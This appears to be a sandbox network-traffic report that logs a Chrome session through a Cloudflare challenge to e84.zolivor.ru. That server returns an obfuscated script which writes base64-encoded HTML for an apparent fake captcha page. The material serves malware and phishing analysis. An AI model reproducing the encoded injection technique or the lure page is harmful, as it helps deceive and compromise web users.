                                                                                        2024-12-24 08:20:02 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 33665
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        CF-Chl-RetryAttempt: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:02 UTC16384OUTData Raw: 76 5f 38 66 36 66 32 38 33 66 61 62 38 30 63 34 36 31 3d 4f 6c 30 7a 24 76 48 5a 57 68 6c 48 57 6a 5a 48 77 32 73 32 67 6a 6f 48 4a 32 56 7a 6a 58 68 6f 32 37 32 54 72 68 75 48 41 37 32 48 4e 4e 57 47 54 48 43 32 36 46 72 41 54 4b 48 64 6f 32 68 49 32 41 75 32 66 7a 47 6f 6f 6f 46 76 32 76 64 32 6e 72 41 44 6b 6f 32 41 6f 32 74 62 7a 57 32 4c 64 4c 7a 6e 72 32 50 7a 76 59 68 32 74 39 49 68 79 54 2d 4b 30 30 32 6a 46 77 4e 7a 48 70 2d 4b 6b 79 48 63 71 72 58 51 58 58 32 48 39 7a 48 31 6f 48 66 4c 32 41 4b 32 5a 72 32 78 30 7a 6e 32 46 38 76 58 34 66 72 32 52 66 24 42 69 4f 24 6c 38 30 32 74 71 66 39 72 57 7a 39 6a 77 66 30 5a 32 47 4b 6e 6a 41 7a 6a 71 7a 57 72 34 56 49 78 32 41 4f 68 65 77 42 76 6b 70 69 4e 39 57 48 4f 71 31 67 4c 73 33 71 77 31 33 69 46
                                                                                        Data Ascii: v_8f6f283fab80c461=Ol0z$vHZWhlHWjZHw2s2gjoHJ2VzjXho272TrhuHA72HNNWGTHC26FrATKHdo2hI2Au2fzGoooFv2vd2nrADko2Ao2tbzW2LdLznr2PzvYh2t9IhyT-K002jFwNzHp-KkyHcqrXQXX2H9zH1oHfL2AK2Zr2x0zn2F8vX4fr2Rf$BiO$l802tqf9rWz9jwf0Z2GKnjAzjqzWr4VIx2AOhewBvkpiN9WHOq1gLs3qw13iF
                                                                                        2024-12-24 08:20:02 UTC16384OUTData Raw: 63 39 4c 49 6b 32 39 7a 43 7a 2d 56 76 4e 41 4d 49 2d 75 4e 39 71 58 32 55 34 35 2b 47 58 69 32 6a 7a 48 6f 32 36 32 76 61 48 4b 32 4f 7a 68 66 48 75 58 6a 32 6f 54 32 4e 32 2d 32 48 57 32 69 56 37 32 47 57 48 2d 55 52 7a 48 61 48 45 32 74 4e 49 6f 32 38 32 56 32 48 75 32 2b 57 6a 58 41 6e 48 4f 32 73 58 41 6c 32 2b 32 58 72 76 52 32 79 32 46 72 48 4b 32 4d 32 66 72 68 5a 32 4a 32 41 72 47 32 76 5a 32 75 32 6f 32 76 4a 55 6f 32 44 58 48 79 32 56 32 6a 72 32 6c 32 32 7a 41 76 48 54 32 72 58 48 57 32 72 7a 66 57 76 58 76 57 6c 48 75 6a 72 32 46 32 52 32 30 6f 48 50 32 61 58 76 75 32 56 6f 2d 32 30 79 48 37 72 6f 32 48 79 32 41 32 54 72 76 7a 48 51 34 64 7a 6f 72 49 4e 32 65 72 47 4a 32 62 32 52 50 48 57 41 2d 32 56 32 6a 37 38 58 54 44 6e 47 51 32 35 32 76
                                                                                        Data Ascii: c9LIk29zCz-VvNAMI-uN9qX2U45+GXi2jzHo262vaHK2OzhfHuXj2oT2N2-2HW2iV72GWH-URzHaHE2tNIo282V2Hu2+WjXAnHO2sXAl2+2XrvR2y2FrHK2M2frhZ2J2ArG2vZ2u2o2vJUo2DXHy2V2jr2l22zAvHT2rXHW2rzfWvXvWlHujr2F2R20oHP2aXvu2Vo-20yH7ro2Hy2A2TrvzHQ4dzorIN2erGJ2b2RPHWA-2V2j78XTDnGQ252v
                                                                                        2024-12-24 08:20:02 UTC897OUTData Raw: 74 4a 38 52 61 4a 35 41 4a 4e 2b 61 4e 32 78 6b 68 4b 32 4c 6e 65 58 76 61 32 2d 6c 55 7a 35 41 34 65 31 51 32 47 38 4a 78 43 24 75 31 6f 56 4c 32 46 78 5a 70 7a 68 24 58 79 35 70 69 74 32 49 66 37 34 46 74 75 24 48 74 6e 56 4b 6f 57 43 37 6a 61 61 6f 51 78 4a 45 4f 7a 7a 73 76 49 7a 48 24 35 69 38 69 45 48 48 5a 65 38 74 79 72 51 50 56 7a 48 56 45 2b 75 30 78 62 74 49 57 4d 34 69 62 53 4c 54 77 69 77 32 65 4c 49 66 61 32 50 41 6b 5a 69 35 57 4b 68 69 4e 2b 75 79 6c 57 48 66 39 61 54 67 74 32 72 30 71 54 57 48 66 43 39 34 77 44 49 38 59 4c 4e 59 4f 34 46 46 4d 7a 54 33 68 69 69 4d 33 45 53 43 7a 71 4d 33 54 4b 46 66 34 4d 4e 31 59 46 36 76 30 71 6e 47 32 76 63 4b 4b 31 44 36 49 68 7a 75 79 64 4d 67 51 46 49 45 39 45 32 68 58 37 54 74 37 62 45 6f 53 70 76
                                                                                        Data Ascii: tJ8RaJ5AJN+aN2xkhK2LneXva2-lUz5A4e1Q2G8JxC$u1oVL2FxZpzh$Xy5pit2If74Ftu$HtnVKoWC7jaaoQxJEOzzsvIzH$5i8iEHHZe8tyrQPVzHVE+u0xbtIWM4ibSLTwiw2eLIfa2PAkZi5WKhiN+uylWHf9aTgt2r0qTWHfC94wDI8YLNYO4FFMzT3hiiM3ESCzqM3TKFf4MN1YF6v0qnG2vcKK1D6IhzuydMgQFIE9E2hX7Tt7bEoSpv
                                                                                        2024-12-24 08:20:03 UTC1312INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:20:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 4544
                                                                                        Connection: close
                                                                                        cf-chl-out-s: FIJZ/y4L+tUMJMwho+khm+HEuOGS+p6GgDdoutTgKpjrb3vQkeYrJ7UYUmPetQQ/jMcwPRPaR5rj2grvyBWHsOzuULPJdjAwtRKjN/5cHt22OTcA9s9COpxkK4HxYLY3PpWK3QBhQumWrNzuf06rqCLGiKwVTUiDLgjn31Ho0j2Y4YvDPtALO3zvR5p2fWtQ5okS2xnjv1NG86i/bjIM+X9ivEZWfT103VIPVOW+rrPNI7rQGDrMhq8UKAT5H4lUDvL5U/WHMHId0Php29H1vQ3D34qisOSpaEQekZFPvmu2+Xg+PQdS5c8eTSFhGWN0/s0FgsOffQoKTW9N1QvLCNARZwvCmlKG/0fjyZ50b6QHPWIW1qWZtZ8nnIDNIDInQ9J1vJzZAwsnx24RXC+qTep0zQylxXVMcBPLSE1QUTppOoRQr7CZeG0uYaHYjiflRTqFFo5Zg2rf6DynhG7yTz8al0wJd+tEdWpuJ/+p0OakMj5wK6mT7QVrzEK4PCWG87Yu5wy/SvWxJUJuxezR3m0DwUFfUu30FJ/Kc7Auvo+Ckosud0mYWwJM8o+U+iB8zPQ4zrm+XgtnL/YfxfsV9T04ee/JEx8YQL3rwLOWnfj/WXGmYr2PoIcoUAR/k6ewdaJM7T3mHFskYOC2ENH6GGNzYcyXdMOJzJhz5K5K1VSSNu8prTldImHJbYQyK5RosxSx45Y0tRFQCRFj/Va1W+A5fpQG3xxx6sI2j4FcFuidUPd5ERYwuOALctgCWkBLaF83SXihzWNLC2u6g8NBUfUvicusFLXlaY6J9ioL1U/ZdLzkLpzPOEi99HThUj8YFYQKxvqakM1dSaCfwnMAJJqwwWpFpDZorrJlm7xJWyxlsWlorwLO/EqFkiWf3KPHqJelFg1k9INaO4eEUG+e0/irHC8uxZDHY40LTjrQZzedMCuB4QdzPERqwMIOuVgiSOyt2kATN0HXHauvxY3nkQ0f7kR4g5C4PAa+gwObFnJOrSB10V [TRUNCATED]
                                                                                        2024-12-24 08:20:03 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 45 6a 4b 4f 54 30 67 47 73 37 68 6d 65 61 47 41 57 73 56 41 69 61 49 52 6e 6e 78 72 59 49 30 36 46 47 4c 35 76 51 43 42 55 6e 6d 79 6e 75 50 34 77 68 74 54 76 45 53 46 45 4c 62 64 76 4a 2f 46 63 4c 62 77 55 65 57 73 78 76 4b 33 4b 6b 53 4a 4e 47 43 71 57 50 2b 49 67 65 75 30 62 41 45 6a 50 2b 75 35 49 61 62 7a 75 4d 4f 4b 4f 39 57 74 75 66 62 6c 43 58 59 3d 24 30 45 6b 52 6c 57 6b 4d 53 38 55 61 6b 6c 51 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 36 66 32 62 37 63 65 64 39 37 63 34 30 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                        Data Ascii: cf-chl-out: EjKOT0gGs7hmeaGAWsVAiaIRnnxrYI06FGL5vQCBUnmynuP4whtTvESFELbdvJ/FcLbwUeWsxvK3KkSJNGCqWP+Igeu0bAEjP+u5IabzuMOKO9WtufblCXY=$0EkRlWkMS8UaklQeServer: cloudflareCF-RAY: 8f6f2b7ced97c407-EWRalt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:20:03 UTC1193INData Raw: 64 62 79 77 6e 71 47 33 68 49 57 79 6c 35 6d 44 73 34 6d 5a 71 38 71 6c 68 72 44 53 71 4d 6d 70 6a 73 4c 55 77 36 71 70 31 36 72 54 31 61 33 5a 7a 72 2f 56 74 4e 2f 62 75 73 66 4a 74 72 54 75 7a 62 71 34 36 4d 58 51 38 75 2f 4f 30 39 54 48 38 4e 48 77 76 4d 67 41 7a 4f 33 51 41 37 76 62 7a 75 44 45 33 67 6a 2b 35 76 6e 68 45 51 66 44 36 74 34 4b 46 4d 2f 68 32 4e 54 32 2b 4e 54 34 2b 68 54 74 45 2b 37 66 46 69 49 6a 41 43 63 53 39 42 67 66 49 76 34 66 4a 79 44 38 49 69 67 49 43 54 50 76 43 7a 67 30 37 76 73 37 4f 77 38 35 50 77 4a 42 51 54 34 46 50 41 5a 4a 50 78 63 32 4b 42 73 75 48 69 6f 76 4b 55 4e 43 46 55 70 62 4f 43 6f 7a 58 78 55 7a 50 45 45 64 4e 30 35 52 4d 31 52 6a 53 56 6f 6e 62 54 59 68 58 7a 42 70 4c 43 74 78 64 6b 56 4d 56 6e 74 35 4e 6c 56
                                                                                        Data Ascii: dbywnqG3hIWyl5mDs4mZq8qlhrDSqMmpjsLUw6qp16rT1a3Zzr/VtN/busfJtrTuzbq46MXQ8u/O09TH8NHwvMgAzO3QA7vbzuDE3gj+5vnhEQfD6t4KFM/h2NT2+NT4+hTtE+7fFiIjACcS9BgfIv4fJyD8IigICTPvCzg07vs7Ow85PwJBQT4FPAZJPxc2KBsuHiovKUNCFUpbOCozXxUzPEEdN05RM1RjSVonbTYhXzBpLCtxdkVMVnt5NlV
                                                                                        2024-12-24 08:20:03 UTC1369INData Raw: 44 51 7a 4a 42 59 68 4d 43 59 41 51 44 31 4c 50 44 67 39 47 55 4e 4e 53 53 51 55 42 7a 39 58 55 44 55 7a 53 78 64 57 52 31 4d 59 57 56 59 65 52 57 42 54 54 7a 4a 56 56 69 5a 6f 50 56 35 41 49 6b 52 4c 61 47 78 44 59 6d 74 72 63 32 6f 31 4f 57 68 72 64 48 68 54 61 6e 74 69 55 6e 78 5a 57 6c 68 31 52 49 61 47 68 48 42 64 55 57 4e 4d 54 57 79 44 64 35 68 6c 62 57 57 55 62 4a 53 54 6c 31 79 54 6d 59 4b 51 65 48 68 35 71 61 43 6a 67 6e 65 61 61 6e 36 47 6f 35 4e 7a 72 61 79 6e 74 32 2b 4e 69 34 61 4f 74 62 57 5a 76 62 69 6b 66 5a 71 33 70 35 7a 45 73 35 75 65 77 61 43 75 69 38 33 47 6f 37 58 50 77 36 65 4b 72 4d 37 4c 32 39 50 54 7a 38 79 72 79 38 4f 75 72 64 66 58 33 4e 48 4c 70 38 58 6f 35 4c 6d 74 77 4d 62 54 33 38 50 49 37 72 6a 78 38 50 75 35 79 75 36 36
                                                                                        Data Ascii: DQzJBYhMCYAQD1LPDg9GUNNSSQUBz9XUDUzSxdWR1MYWVYeRWBTTzJVViZoPV5AIkRLaGxDYmtrc2o1OWhrdHhTantiUnxZWlh1RIaGhHBdUWNMTWyDd5hlbWWUbJSTl1yTmYKQeHh5qaCjgneaan6Go5Nzraynt2+Ni4aOtbWZvbikfZq3p5zEs5uewaCui83Go7XPw6eKrM7L29PTz8yry8OurdfX3NHLp8Xo5LmtwMbT38PI7rjx8Pu5yu66
                                                                                        2024-12-24 08:20:03 UTC1369INData Raw: 59 52 48 79 45 45 46 41 51 66 4a 79 45 66 45 6a 74 4c 42 77 67 33 45 42 45 56 4a 55 51 7a 4c 52 55 67 4c 44 6b 35 54 46 39 69 52 79 4a 56 4f 6b 68 49 56 6c 31 6d 4c 6c 35 66 50 6d 4a 56 56 33 68 4b 57 6e 46 4e 57 6c 42 7a 55 44 31 7a 64 54 35 38 62 6d 5a 44 66 48 64 39 53 47 5a 2f 67 6b 78 34 66 49 5a 50 58 32 74 4d 62 48 4a 70 56 32 61 49 61 5a 68 73 57 6d 78 63 67 70 39 68 64 36 4b 48 59 47 69 58 6e 6f 74 33 6d 32 75 66 63 4c 43 44 73 33 57 6c 68 49 39 35 6d 4a 69 57 6e 33 71 38 69 72 6e 43 73 4d 53 36 78 49 57 65 71 4a 72 48 67 37 79 74 6a 5a 75 2b 73 63 75 52 77 64 50 5a 79 70 72 4f 6c 72 69 33 73 71 44 61 32 4a 37 58 77 37 32 78 34 37 54 61 74 38 44 6a 35 4d 48 49 73 4d 54 42 7a 65 6e 51 36 2b 44 74 31 4f 7a 64 38 4e 6e 4b 39 39 4c 62 34 4f 58 77 32
                                                                                        Data Ascii: YRHyEEFAQfJyEfEjtLBwg3EBEVJUQzLRUgLDk5TF9iRyJVOkhIVl1mLl5fPmJVV3hKWnFNWlBzUD1zdT58bmZDfHd9SGZ/gkx4fIZPX2tMbHJpV2aIaZhsWmxcgp9hd6KHYGiXnot3m2ufcLCDs3WlhI95mJiWn3q8irnCsMS6xIWeqJrHg7ytjZu+scuRwdPZyprOlri3sqDa2J7Xw72x47Tat8Dj5MHIsMTBzenQ6+Dt1Ozd8NnK99Lb4OXw2
                                                                                        2024-12-24 08:20:03 UTC613INData Raw: 45 43 42 68 52 4b 54 45 68 4d 7a 4d 78 52 45 59 7a 55 6c 64 4e 56 56 49 66 59 54 68 58 4d 6b 39 62 61 47 4e 61 53 6b 78 6e 4e 6a 38 6d 4f 47 64 4a 4d 46 52 74 55 57 74 42 56 6c 6b 30 56 48 78 5a 57 6e 39 62 58 48 4f 44 62 6d 42 6b 68 31 78 66 56 6d 31 61 68 57 31 74 68 58 4f 4c 58 6f 4e 72 69 32 47 47 64 6f 75 58 61 48 5a 74 67 59 74 30 57 33 4a 31 65 59 4b 42 6c 34 75 64 6a 59 4b 4c 70 71 75 6a 6a 36 52 6d 71 4a 47 55 6c 61 53 55 72 35 57 4a 6e 70 47 59 75 4a 53 4e 75 35 47 59 75 4c 2b 54 70 61 66 44 6e 61 65 68 71 5a 79 73 77 34 33 48 79 74 66 50 72 39 47 6e 76 62 65 2b 76 4d 6a 50 75 38 47 78 74 4c 2f 62 77 72 72 42 37 4d 6a 71 77 38 76 66 76 73 2b 2f 74 4d 2f 57 72 75 37 33 7a 4e 6e 46 79 66 58 4b 33 66 4c 65 39 74 48 77 33 39 66 38 2b 4f 62 73 44 4f
                                                                                        Data Ascii: ECBhRKTEhMzMxREYzUldNVVIfYThXMk9baGNaSkxnNj8mOGdJMFRtUWtBVlk0VHxZWn9bXHODbmBkh1xfVm1ahW1thXOLXoNri2GGdouXaHZtgYt0W3J1eYKBl4udjYKLpqujj6RmqJGUlaSUr5WJnpGYuJSNu5GYuL+TpafDnaehqZysw43HytfPr9Gnvbe+vMjPu8GxtL/bwrrB7Mjqw8vfvs+/tM/Wru73zNnFyfXK3fLe9tHw39f8+ObsDO


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.450038104.18.95.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:04 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:05 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 08:20:04 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cf-chl-out: GIhTtWJP5eK6/ARlTii+y1cCukh0/H4+D7M=$X9BHLj215Sa6DcgN
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2b8a4b05f797-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:20:05 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.450046104.21.112.14434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:20:06 UTC716OUTGET /OSkl/ HTTP/1.1
                                                                                        Host: e84.zolivor.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://5m9sp7.naomijewelryjapan.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:20:07 UTC1244INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:20:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: no-cache, private
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bkkMsudhlDVrOfNC1HRHg3gaJ4IBBYVD7N5CG9BSQ9mkXs5LEwaEBlAXJ04aweziISF5pReYZ5usD0o2OGNQsrcckh6QbcMc%2BrhtdfcnzIGtY79RsigN8WYGzbXsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=777&rtt_var=848&sent=49&recv=27&lost=0&retrans=0&sent_bytes=32512&recv_bytes=3064&delivery_rate=13868312&cwnd=254&unsent_bytes=0&cid=4580c877ea4a0f15&ts=209508&x=0"
                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6Im1CM3pYYVNmRXRjQnJOWk1Ia3lYZkE9PSIsInZhbHVlIjoiNmJpQXpmRmM1RzB1M0hkTzJKUHhYaTJ0RkRpblM4WGZ3eUFSQ3JNckgvWjJvRjdOWHUrRDdhYzB3UUtUaEk1ZkRXRUpjcUgvR3dsdHFaNm9vRHYxR292Um9aT3JZd2txRFErS0xCTDlaNVVKbm5TeXR1SEVPaGVRVkJSeGlFNFoiLCJtYWMiOiIxMGU4NWExMzhhMjc4ZjdlYjg1MTg4NWNjNDc4ZGQ4ZjI1ZDUyZWVjNDdmYWYyYzYwYzRhMTQzY2RkMzIzOTE4IiwidGFnIjoiIn0%3D; expires=Tue, 24-Dec-2024 10:20:06 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                        2024-12-24 08:20:07 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 6c 30 4d 58 64 70 4e 44 68 50 64 6c 68 4d 52 33 6c 73 51 6d 6b 30 65 58 68 55 65 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 48 5a 32 59 58 68 69 55 54 63 32 54 55 34 32 63 33 4d 30 59 6b 74 5a 63 47 35 55 62 7a 4a 49 64 57 56 73 54 43 39 6f 61 57 59 72 51 6d 4e 73 52 33 56 6f 64 32 5a 52 63 6d 70 58 65 45 64 52 4b 31 46 6a 4e 33 46 43 64 31 4e 30 51 55 5a 79 51 6a 52 47 61 6e 59 79 4e 55 34 7a 64 47 5a 6c 54 45 59 72 61 45 38 7a 55 7a 6c 42 53 7a 56 5a 56 47 31 6f 56 6a 6c 7a 59 7a 6c 33 65 45 68 75 54 47 56 6a 53 32 5a 73 5a 6a 64 47 53 30 4a 59 56 54 6c 6e 56 33 68 48 51 30 52 74 54 55 46 69 63 55 5a 58 65 6a 56 33 4d 30 4d
                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Inl0MXdpNDhPdlhMR3lsQmk0eXhUelE9PSIsInZhbHVlIjoiUHZ2YXhiUTc2TU42c3M0YktZcG5UbzJIdWVsTC9oaWYrQmNsR3Vod2ZRcmpXeEdRK1FjN3FCd1N0QUZyQjRGanYyNU4zdGZlTEYraE8zUzlBSzVZVG1oVjlzYzl3eEhuTGVjS2ZsZjdGS0JYVTlnV3hHQ0RtTUFicUZXejV3M0M
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 36 31 62 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6c 4f 44 51 75 65 6d 39 73 61 58 5a 76 63 69 35 79 64 53 39 50 55 32 74 73 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f
                                                                                        Data Ascii: 61b2<script>/* Success is not the key to happiness. Happiness is the key to success. */if(atob("aHR0cHM6Ly9lODQuem9saXZvci5ydS9PU2tsLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 58 67 36 49 44 45 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67
                                                                                        Data Ascii: Xg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAg
                                                                                        2024-12-24 08:20:07 UTC1369INData Raw: 52 6a 61 47 45 74 59 32 68 6c 59 32 74 69 62 33 67 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 32 68 6c 59 32 74 69 62 33 67 69 58 54 70 6a 61 47 56 6a 61 32 56 6b 49 43 73 67 62 47 46 69 5a 57 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43
                                                                                        Data Ascii: RjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNC
